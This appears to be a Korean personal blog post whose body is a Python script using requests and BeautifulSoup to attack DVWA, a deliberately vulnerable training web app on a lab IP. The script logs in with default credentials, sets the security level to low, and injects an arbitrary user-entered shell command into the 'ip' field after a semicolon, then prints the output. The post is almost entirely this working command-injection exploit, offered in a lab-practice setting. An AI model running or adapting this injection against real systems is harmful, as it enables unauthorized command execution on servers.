Self-Improvement
requests 모듈을 통한 DVWA Low Command injection 본문
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 | import os import requests from bs4 import BeautifulSoup import re import sys #login login_url = 'http://192.168.10.134/dvwa/login.php' login_data = {'username':'admin', 'password':'password', 'Login':'Login'} proxies = {'http':'http://localhost:9000', 'https':'http://localhost:9000'} s = requests.session() req = requests.Request('POST', login_url, data=login_data) prepared = s.prepare_request(req) resp = s.send(prepared, proxies = proxies) soup = BeautifulSoup(resp.text,'lxml') MESS1='Welcome to Damn Vulnerable Web App!' if re.search(MESS1, str(soup.h1.string)): print('[ ok ] login') else: print("[ fail ] login") sys.exit(2) #low level setting security_url='http://192.168.10.134/dvwa/security.php' security_data={'security':'low','seclev_submit':'Submit'} resp=s.post(security_url,data=security_data, proxies=proxies) soup=BeautifulSoup(resp.text,'lxml') if re.search('low', str(soup.em.string)): print('[ ok ] low setting') else: print('[ fail] low not setting') sys.exit(3) #vulnerablility check && Attack Code url = 'http://192.168.10.134/dvwa/vulnerabilities/exec/' cmd=input('Enter your CMD : ') data = {'ip':'192.168.10.134;'+cmd,'submit':'submit'} resp=s.post(url,data,proxies=proxies) soup=BeautifulSoup(resp.text,'lxml') if re.search('index.php', str(soup.pre)): print("[ ok ] commend injection vulnerablility") else: print("[ fail ] commend injection not vulnerablility") sys.exit(4) fd=open('command.txt', 'w+') fd.write(soup.pre.string) fd.close() os.system('cat command.txt') | cs |
'프로그래밍 > Python' 카테고리의 다른 글
| requests으로 DVWA의 Login-dirctionary (0) | 2018.10.21 |
|---|---|
| requests 모듈을 통한 DVWA Low SQL-injection (0) | 2018.10.21 |
| python BeautifulSoup (0) | 2018.10.21 |
| python request 모듈 (0) | 2018.10.21 |
| Head First Python 5-1장 (0) | 2018.10.21 |